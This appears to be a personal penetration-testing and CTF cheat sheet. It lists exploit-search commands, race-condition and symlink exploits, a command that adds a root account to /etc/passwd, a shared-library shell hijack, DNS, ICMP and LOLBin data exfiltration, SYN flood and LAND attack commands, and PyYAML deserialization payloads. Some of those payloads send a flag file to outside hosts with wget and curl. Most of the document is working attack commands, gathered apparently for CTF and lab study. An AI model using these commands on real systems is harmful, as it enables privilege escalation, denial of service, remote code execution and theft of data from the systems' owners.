-
https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/
-
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
-
http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
-
https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Building_A_Lab.md
- Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
- Shodan Exploits
- CVE security vulnerability database. Security vulnerabilities, exploits, references and more
- Exploit Files - Packet Storm
- Vulners - Vulnerability Data Base
- 💀 Sploitus | Exploit & Hacktool Search Engine
- Snyk - Open Source Security
- SG TCP/IP Ports Database
# https://github.com/offensive-security/exploitdb.git
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
# Given exploit with available metasploit module
msf > search $regex
-
username= password= cookie1="PHPSESSID=3k21rt4acut215r1adlrq5m0p0" cookie2="PHPSESSID=ck8pgb52nkkb8sdg2c95ms7s16" url="http://202.120.7.197/app.php" curl "$url?action=login" -b $cookie1 -d "username=$username&pwd=$password" & curl "$url?action=login" -b $cookie2 -d "username=$username&pwd=$password" curl "$url?action=buy&id=1" -b $cookie1 curl "$url?action=sale&id=1" -b $cookie1 & curl "$url?action=sale&id=1" -b $cookie2
-
https://github.com/saw-your-packet/ctfs/blob/master/DarkCTF/Write-ups.md#-chain-race
- ~/share/ctf/darkctf2020/chain-race/
while true; do
dd if=/dev/urandom count=$((1024 * 20)) bs=1024 > bigfile
chmod 777 bigfile
/exploitable bigfile &
ln -sf /root/flag.txt bigfile
sleep 0.1
rm -f bigfile
done
- Book - HackThebox | Samir Ettali
- https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
# logrotate: stat /tmp/logs/file.log # attacker: mv /tmp/logs /tmp/logs2 ln -s /etc/bash_completion.d /tmp/logs # logrotate: create+chown /tmp/logs/file.log # attacker: echo 'payload' > /tmp/logs/file.log # On root login, payload executed
- https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
-
busybox - act as arbitrary file
# if owner of file, can use chmod to fix permissions upx -o /tmp/chmod /bin/busybox # || tar # || /lib/ld-musl-x86_64.so.1 /bin/busybox cat # || setpriv /bin/busybox cat
-
root owned + bad permissions (e.g. 777)
- if shared library, compile our own, given called function "foo":
#include <stdlib.h> void foo() { system("/bin/sh"); }
gcc vuln.c -shared -o vuln.so
- if shared library, compile our own, given called function "foo":
- ~/opt/privilege-escalation-awesome-scripts-suite/
- ~/opt/LinEnum/
sudo -l
# specific uid
find / -uid 1001 -type f 2>/dev/null
# suid
find / -perm -u=s -type f 2>/dev/null
-
/etc/shadow
:- hash algorithm
$1
= MD5
- hash algorithm
-
/etc/passwd
:- password field
- empty:
user1::.....
- disabled:
user1:*:.....
- in
/etc/shadow
:user1:x:.....
- empty:
# Given pass `foo` encrypted as `aaKNIEDOaueR6` perl -le 'print crypt("foo", "aa")' # || Encrypt with random salt openssl passwd foo echo "root2:aaKNIEDOaueR6:0:0:root:/root:/bin/bash" >> /etc/passwd
- password field
-
https://en.wikipedia.org/wiki/Crypt_(C)#Key_derivation_functions_supported_by_crypt
-
~/code/src/pocs/dirtycow/dirty.c
- ~/code/src/pocs/cowroot.c
-
https://github.com/SecWiki/linux-kernel-exploits/tree/master/2014/CVE-2014-3153
- ODBC
-- Given: .odbc.ini -- [lalala] -- Driver=/var/lib/clickhouse/user_files/test.so SELECT * FROM odbc('DSN=lalala', 'test', 'test');
- Hacking with Environment Variables
- /proc/self/cmdline
- /proc/self/cwd
- /proc/self/environ
- /proc/self/exe
- /proc/self/maps
- [!] zero size, but sequentially readable (e.g.
cat
, http request with headerRange: bytes 0-4096
)
- [!] zero size, but sequentially readable (e.g.
- DNS
- https://www.aldeid.com/wiki/File-transfer-via-DNS
# 1. server sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.1.29' # 2. client for b in `cat loremipsum.hex`; do dig @192.168.1.23 $b.fakednsrequest.com; done # 3. server tcpdump -n -r loremipsum.pcap 'host 192.168.1.29 and host 192.168.1.23' \ | grep fakednsrequest \ | cut -d ' ' -f 8 \ | cut -d '.' -f 1 \ | uniq \ | xxd -r -p > loremipsum.txt
- https://github.com/leonjza/dnsfilexfer
- https://github.com/vp777/DNS-data-exfiltration
- https://github.com/coryschwartz/dns_exfiltration
- https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/
- https://www.aldeid.com/wiki/File-transfer-via-DNS
- TCP
# ICMP (using file contents) hping3 -E foo.txt -1 -u -i 10 -d 1.2.3.4 95 # TCP ACK (using file contents) hping3 -E foo.txt -A 1.2.3.4 # SYN flood hping3 -V -c 1000 -d 100 -p 8080 -S -- flood 1.2.3.4 # LAND attack hping3 -V -c 1000 -d 100 -p 8080 -s 18080 -S -k -a 1.2.3.4 1.2.3.4
# https://debugactiveprocess.medium.com/data-exfiltration-with-lolbins-20e5e9c1ed8e C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe /out:C:\\temp\\foo /uri:https://foo?$data
- URI scheme
- file, ftp, zlib, data, glob, phar, ssh2, rar, ogg, ftps, compress.zlib, compress.bzip2, zip
- bypass URL access rules with redirections (responses with code 3xx)
- repeat parameter containing url to visit: 2nd url redirects to 3rd url
<?php header('HTTP/1.1 301 Redirect'); header('Location: php://filter/string.toupper/resource=index.php'); ?>
- USB over IP
# On localhost: # Given "GatewayPorts yes" enabled in $vps_host sshd_config ssh $user@$vps_host -R 3240:localhost:3240 # On $vps_host: sudo modprobe usbip-host sudo modprobe usbip-core sudo usbipd -D sudo usbip list -l # Take bus id of second keyboard = 1-7 sudo usbip --debug bind -b 1-7 # On $vulnerable_host: # Given TTY of connected user = ttyS0 /sbin/usbip attach -r $vps_host -b 1-7 & cat /dev/ttyS0 # On $vps_host: cat flag.txt > /dev/ttyS0
- TLS SNI field
- base64
- 4 char block = 3 char message
echo 00 | xxd -r -p | base64 # AA== echo 0000 | xxd -r -p | base64 # AAA= echo 000000 | xxd -r -p | base64 # AAAA echo 4141 | xxd -r -p | base64 # QUE= echo 41 | xxd -r -p | base64 # QQ== echo 4141 | xxd -r -p | base64 # QUE= echo 414141 | xxd -r -p | base64 # QUFB
- URL payloads: base64url
- public keys - JWK
- https://en.wikipedia.org/wiki/Category:Binary-to-text_encoding_formats
- hostnames
- replacement character - replace an unknown, unrecognized or unrepresentable character
\xEF\xBF\xBD = U+FFFD = �
- https://en.wikipedia.org/wiki/Specials_%28Unicode_block%29
The Morse code consists of several "dot", "dash" and "interval". The ratio of "dot" and "dash" is 1:3, The ratio of "intra-code interval", "inter-code interval" and "code group interval" is 1:3:5 - ~/Downloads/Morse Recognition Algorithm Based on K-means.pdf
- "dot" = ".", "dash" = "-", "intra-code interval" = " ", "inter-code interval" = " ", "code group interval" = "/"
- https://morsecode.world/international/timing.html
- sound of keystrokes to keys
- digital radio transmission decoder
- PyYAML yaml.load()
- https://imcmy.me/hitcon-ctf-2016-writeup-archive/
some_option: !!python/object/apply:os.system ["cat flag.txt"]` # || some_option: !!python/object/apply:subprocess.call args: [wget foo.com/"$(cat flag)"] kwds: {shell: true}
- https://hackmd.io/@harrier/uiuctf20
!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "\x5f\x5fimport\x5f\x5f('os')\x2esystem('curl -POST mil1\x2eml/jm9 -F x=@flag\x2etxt')"
- https://imcmy.me/hitcon-ctf-2016-writeup-archive/